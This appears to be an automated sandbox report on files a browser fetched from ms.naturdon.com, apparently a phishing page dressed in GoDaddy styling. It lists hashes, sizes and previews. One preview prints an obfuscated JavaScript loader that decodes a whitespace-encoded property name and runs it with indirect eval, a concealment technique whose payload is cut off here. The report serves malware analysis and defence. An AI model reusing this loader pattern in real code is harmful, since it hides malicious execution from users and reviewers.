                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):28000
                                                                                                                                                                                                                        Entropy (8bit):7.99335735457429
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                                                                                                                                                        SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                                                                                                                                                        SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                                                                                                                                                        SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/GDSherpa-bold.woff2
                                                                                                                                                                                                                        Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):170
                                                                                                                                                                                                                        Entropy (8bit):4.869076242238048
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:6D433EE1DE02AEB33A31DEB779698599
                                                                                                                                                                                                                        SHA1:3AF8D6267E6F3B941583B5291A72661511DA56B9
                                                                                                                                                                                                                        SHA-256:A72EB6CC97ABDCD7D43EA84ED824478B0D28836B5AB864D33A85805778A33734
                                                                                                                                                                                                                        SHA-512:851D23412DFE08AAA6DE52E00E6C8964DDDF770C35C61688A9F8596D2F2DA28D370D58D1B9CD1BDBD3BE8B7CE2F4BD36A7CFA2913E7EB31E3FD36752AEA85399
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /v1/getDownloadUrlFromWhiteboard</pre>.</body>.</html>.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):35786
                                                                                                                                                                                                                        Entropy (8bit):5.058073854893359
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                                                                                                                                                                        SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                                                                                                                                                                        SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                                                                                                                                                                        SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/xynACghvrsuVjigh30
                                                                                                                                                                                                                        Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8777)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):8821
                                                                                                                                                                                                                        Entropy (8bit):5.196885949430213
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0B0F1A4588D510D18180A18DDD890F30
                                                                                                                                                                                                                        SHA1:A09132A5FD2E051E29F32123B9F59D8C17EAD476
                                                                                                                                                                                                                        SHA-256:E9FF9050FF9E6EF7AE7F2C9E4C69C849E2C674050F534685169D5F0804B5ABE8
                                                                                                                                                                                                                        SHA-512:677F413FEB4C96743B63DF799CC2777E1F7827DE82C5C5433ACF29AEE1540DFF43B59056808F9F37001CA637B29FA91D6E04B24568C313CB3619440CBB2BE80D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/index-06eeb664.js
                                                                                                                                                                                                                        Preview:import{e_ as f,e$ as c,f0 as I,f1 as z,f2 as O,f3 as w,f4 as D,f5 as g,f6 as P,f7 as A,f8 as m,f9 as E,fa as L,fb as M,fc as R,fd as F,fe as B,ff as Q,fg as W}from"./main-4c0c8700.js";import{i as G}from"./is-plan-event-enabled-e020507e.js";import{i as k}from"./helpers-28f3a226.js";import"./accountApi-672c2e6f.js";import"./spark-md5-9953c3d1.js";import"./_commonjs-dynamic-modules-5cb9de4b.js";(function(){try{var n=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},t=new Error().stack;t&&(n._sentryDebugIds=n._sentryDebugIds||{},n._sentryDebugIds[t]="d9ff45f1-372c-4754-a482-dcd182ef02d2",n._sentryDebugIdIdentifier="sentry-dbid-d9ff45f1-372c-4754-a482-dcd182ef02d2")}catch{}})();function S(n){return n.toLowerCase().replace(".","").replace(/\s+/g,"-")}function C(n,t){return t===void 0&&(t=!1),t?btoa(n).replace(/=/g,""):void 0}function T(n){return("Integration"in n?n.Integration:n).prototype.name}function U(n,t,e){var r,a;try{var i=((a=(r=window==null?void 0:window.perf
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):4724541
                                                                                                                                                                                                                        Entropy (8bit):2.5839796656457863
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                                                                                                                                                                                        SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                                                                                                                                                                                        SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                                                                                                                                                                                        SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/56yq2nzzAZjcnfYKxPLQIlvxklVwZtCP7Ar9f289103
                                                                                                                                                                                                                        Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):644
                                                                                                                                                                                                                        Entropy (8bit):4.6279651077789685
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                                                                                                                        SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                                                                                                                        SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                                                                                                                        SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28228)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):28277
                                                                                                                                                                                                                        Entropy (8bit):5.210847083904635
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4E4E40C0CCC652A7CC4CEF7C2146C1F5
                                                                                                                                                                                                                        SHA1:45B78F7C8687B680DAE7B6A09FB1B9CBEA7C2D34
                                                                                                                                                                                                                        SHA-256:C664E784D6CBA355616EA0A6EB59603579A7B0E49FC4B9595264BA736AECCB4D
                                                                                                                                                                                                                        SHA-512:98C8AFDBC62EE4C50927F1B4C988436FA4D38F57AA76B400C9B2098A3A10797A345EA15AC779C1C0A02285C83372F641E8480C70175575ED719D4FF573F1FBA3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://cdn.segment.com/next-integrations/actions/845/449cd4534726259c2a8c.js
                                                                                                                                                                                                                        Preview:(self.webpackChunkDestination=self.webpackChunkDestination||[]).push([[845],{1291:(e,t,r)=>{"use strict";const n=r(6150),o=r(6086);class a extends Error{constructor(e){if(!Array.isArray(e))throw new TypeError("Expected input to be an Array, got "+typeof e);let t=(e=[...e].map((e=>e instanceof Error?e:null!==e&&"object"==typeof e?Object.assign(new Error(e.message),e):new Error(e)))).map((e=>"string"==typeof e.stack?o(e.stack).replace(/\s+at .*aggregate-error\/index.js:\d+:\d+\)?/g,""):String(e))).join("\n");t="\n"+n(t,4),super(t),this.name="AggregateError",Object.defineProperty(this,"_errors",{value:e})}*[Symbol.iterator](){for(const e of this._errors)yield e}}e.exports=a},6086:(e,t,r)=>{"use strict";const n=r(1209),o=/\s+at.*(?:\(|\s)(.*)\)?/,a=/^(?:(?:(?:node|(?:internal\/[\w/]*|.*node_modules\/(?:babel-polyfill|pirates)\/.*)?\w+)\.js:\d+:\d+)|native)/,s=void 0===n.homedir?"":n.homedir();e.exports=(e,t)=>(t=Object.assign({pretty:!1},t),e.replace(/\\/g,"/").split("\n").filter((e=>{cons
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Java source, ASCII text, with very long lines (1572)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1616
                                                                                                                                                                                                                        Entropy (8bit):5.280292368034177
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:001E6C50B82FC50713A36EC93CE1569D
                                                                                                                                                                                                                        SHA1:E154C9265F43A84B93BA94CF97CCA1380F6C36D5
                                                                                                                                                                                                                        SHA-256:6776A9CB2D391FCC11161761C88A189FED03D7AA5BF28CE986BC9E3CC74D9B9A
                                                                                                                                                                                                                        SHA-512:36C92A7247E6E87230A55244B31ADFC39F1DDF0905154D7697A2460C63DAACD94C7C734BE66C002F5CAA56D5693A24323F759C8630C867C9CC05C62B34A0C5DC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/index-e57bd1fd.js
                                                                                                                                                                                                                        Preview:import{f5 as f}from"./main-4c0c8700.js";import{i as d}from"./is-plan-event-enabled-e020507e.js";import"./accountApi-672c2e6f.js";import"./spark-md5-9953c3d1.js";import"./_commonjs-dynamic-modules-5cb9de4b.js";(function(){try{var n=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},o=new Error().stack;o&&(n._sentryDebugIds=n._sentryDebugIds||{},n._sentryDebugIds[o]="eaafc629-d9f9-4fda-ba71-472f7c001efb",n._sentryDebugIdIdentifier="sentry-dbid-eaafc629-d9f9-4fda-ba71-472f7c001efb")}catch{}})();function c(n,o){var t,i;if(!n||!Object.keys(n))return{};var s=n.integrations?Object.keys(n.integrations).filter(function(e){return n.integrations[e]===!1}):[],a=[];return((t=o.remotePlugins)!==null&&t!==void 0?t:[]).forEach(function(e){s.forEach(function(r){(e.name.includes(r)||r.includes(e.name))&&a.push(e.name)})}),((i=o.remotePlugins)!==null&&i!==void 0?i:[]).reduce(function(e,r){return r.settings.subscriptions&&a.includes(r.name)&&r.settings.subscriptions.forEach(function
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):43596
                                                                                                                                                                                                                        Entropy (8bit):7.9952701440723475
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                                                                                                        SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                                                                                                        SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                                                                                                        SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/GDSherpa-vf.woff2
                                                                                                                                                                                                                        Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 516549
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):159251
                                                                                                                                                                                                                        Entropy (8bit):7.998090782530029
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:7813EC86E475F90CAC93AB2F49717ECA
                                                                                                                                                                                                                        SHA1:9E3A6077C1F63180874DD9AA154C245EBFC696F8
                                                                                                                                                                                                                        SHA-256:BE355A21523CDA1D30A1A35D968EB7432C43ED2B53C89B0C9FE325E00D705C86
                                                                                                                                                                                                                        SHA-512:3E51B66B47650FAE96A76788979244FFCD6AF3F76D559202FF5962A096240ADC6390B33AE9D79C48B91878E247C81DDA281D5DC8C3273B86B0F4AB89EEB5C332
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://js.intercomcdn.com/vendor-modern.c71ca7d4.js
                                                                                                                                                                                                                        Preview:...........y{.8.8..~..o._2.dI.|Pa4N.t.$..I..Vk)...H5I.hS......!..}..u?.@.(....B.....0....b....0Z9...{k.9..3.w..7....eQ..tf..k....}u....%{...7}.S......-.......&....E.p5.=...%MGc....K}4.u....p.;j.-........m.}K"o.h.....pn....1.q....o...E7.dp...x...N.....x0.(..,.2"[4..m.I+q.q.g."Y.../..?...JD+`w.7..`a%.u...D.6........^.'....B.)..3..2*4....L....K*....S.%.1ck....j.{o.....a..b.T.xN,l...c...y0....R....=D._.Yv.".0O.......*@.R..<....l|...k..0._.A.M..%...9.+L.kA..g..K..`.....A.M/@mx.gGV....A.*../......".]...~.Z...L3.>.,9O.......$N..B.L3.....k....K.(..S...Y#....R_>..}.U.k..Ykz.k&$..``....M...s....K..\....d,1.....fI.......+.!..$.....e.%.Vx.(..C.......3.It. ...OK.5.c..F...If.....-..<....'1..@....*U...Rbj..28.....Z...V..s.x?`......a..{'Y..il:...|.h.p.j.D..B./.....0..E0..f\...\..6K.....;3.cl...|J./p..%`..gV....5..;O...Fcdd.&.B.....GS...$...,._'v.\..{ .7.o......@..=4.34..5...7..d...JL>..PK.iV`.}[.Vh.p^!.rL........ke.Z..k.4m.w...mO...n".....m... .k
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):892
                                                                                                                                                                                                                        Entropy (8bit):5.863167355052868
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                                                                                                        SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                                                                                                        SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                                                                                                        SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):592
                                                                                                                                                                                                                        Entropy (8bit):4.301298432132512
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:7240DD2CE90A8584FF9411D174CBB5EA
                                                                                                                                                                                                                        SHA1:F6688DE10D9B0DD85E2BBC9E98950ED52B7F4A21
                                                                                                                                                                                                                        SHA-256:8A89F1D7CCA36C12063222572BAD0CD7604128F0726FA64753B26547F10A7DAD
                                                                                                                                                                                                                        SHA-512:749DD8B5451031C6DDE633541A55DD2568298A9B7F5EA04559A28C26D0074BE08EC30ED85580436E05E3958F32FBA815C2E95047E1FBDE28B3C2F24065930212
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RIFFH...WEBPVP8X.... ...1.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6VP8 Z...p....*2...>m6.H.".!$.....g....8..(....R._.].5.K....9z.i...;> ...+........i.%....=..b...
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):548
                                                                                                                                                                                                                        Entropy (8bit):4.660801881684815
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                                                                                                                                                        SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                                                                                                                                                        SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                                                                                                                                                        SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):975
                                                                                                                                                                                                                        Entropy (8bit):7.428271291186174
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:40E25EA0CC3F01AC8F7FF21BA438321E
                                                                                                                                                                                                                        SHA1:23D3C4CB97450FAD50124A57C725C78F2C671CE6
                                                                                                                                                                                                                        SHA-256:7C043AE1FC8E87FABF058D667D4D24C52F4B3E6B2AD9B85CEB57450A2212577D
                                                                                                                                                                                                                        SHA-512:A619B4D9645B825BA9C4D830F889E8F9A337494B1FCF083F2993060971C7AC019EE4B53F1C39EAF7B61807889F411EBBC9C8223D44880FB34EA1867656BF78BE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/favicon-32x32.png
                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... ......s......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........pHYs.................tIME.....4.;.f...._IDATH..Oh.Q....6i7..R...E1(.....`P.O{..7E...........T.O.\..."..xPA...M....j..f.o<.6..69..i..og.yo..o.us#.^.-V*...z..I..7........2.)u..0.F..&.%.A..C..6ow...t.3.0..m..x......(3...C..f.e...*......H.......sn(........w.k .9.Z.E.}*X.:F.w.R.(...F..q..Y^...Lg..20.E..*._t..s%..Rf "`D.1..C.........+..6c.d..+Cj..@B.i...i..&.1...y......J.l_.[.<].(7Or..ZG..M?#.........~v..=..0....d...|z0...>../^.Fl....o.V.....3..*.. .I(..kv.*&I....D.@DB..h..uvr........D.U.:.w.b..ov.8R....q..`|2=..X.K.Y..R..3.(....:....8Pk..2$..28.<...h..I.v.^\>@p..3..r..D.nq..lj.....2.8[..p..`..x.z...i.......^........."..{f......%tEXtdate:create.2021-12-11T15:52:24+00:00`Ah#...%tEXtdate:modify.2021-12-11T15:52:24+00:00......WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Java source, Unicode text, UTF-8 text, with very long lines (4514)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):4614
                                                                                                                                                                                                                        Entropy (8bit):5.434332154040607
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:DDC0DB6FD991A191929E372690486A2D
                                                                                                                                                                                                                        SHA1:51CFBCEE738651D321020851D0B97AAEC534A025
                                                                                                                                                                                                                        SHA-256:1D1F197078A75A83F829D5FB42AD8F8E4CEBBDA3F764C72DF2CA723C036B5010
                                                                                                                                                                                                                        SHA-512:CD5BE6E33283449F9BD85C4EE8EE4B6F16405DB8EAC37E1E9161FE2983C40FA0FF12AA9867689C375CA9E57C3FC2361E77B66CB42EC5B48A8C5AB7877AE87FFE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/checkIsCommandPaletteInWhiteboardSearchShortcut-2af7b6d4.js
                                                                                                                                                                                                                        Preview:import{h as x,j as o,g as p,tD as y,l as c,b as f,k as S,iK as b,mr as l,L as w,ej as C,hB as I,g_ as N,eA as h}from"./accountApi-672c2e6f.js";import{by as T,M as v,eV as _,eW as P,bH as j,bu as k,eX as D,eY as A,as as O,aE as R,aF as $,b$ as E}from"./main-4c0c8700.js";(function(){try{var e=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},a=new Error().stack;a&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[a]="72853dd0-e365-4b87-85d9-d2516e66cd6d",e._sentryDebugIdIdentifier="sentry-dbid-72853dd0-e365-4b87-85d9-d2516e66cd6d")}catch{}})();function L({children:e,handleClose:a}){const t=x();return a=a||(()=>{t(y())}),o(T,{close:a,centerVertically:!0,className:"p-12",children:o("div",{className:p("h-full max-h-120 w-full max-w-170",{"[--scrollbar-width:0px]":!0}),tabIndex:-1,onClick:a,children:o(v,{className:"hepta-pseudo-overlay flex max-h-full cursor-auto flex-col overflow-hidden rounded-lg bg-menu-texture-bg-hard shadow-main backdrop-blur-[100px] aft
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
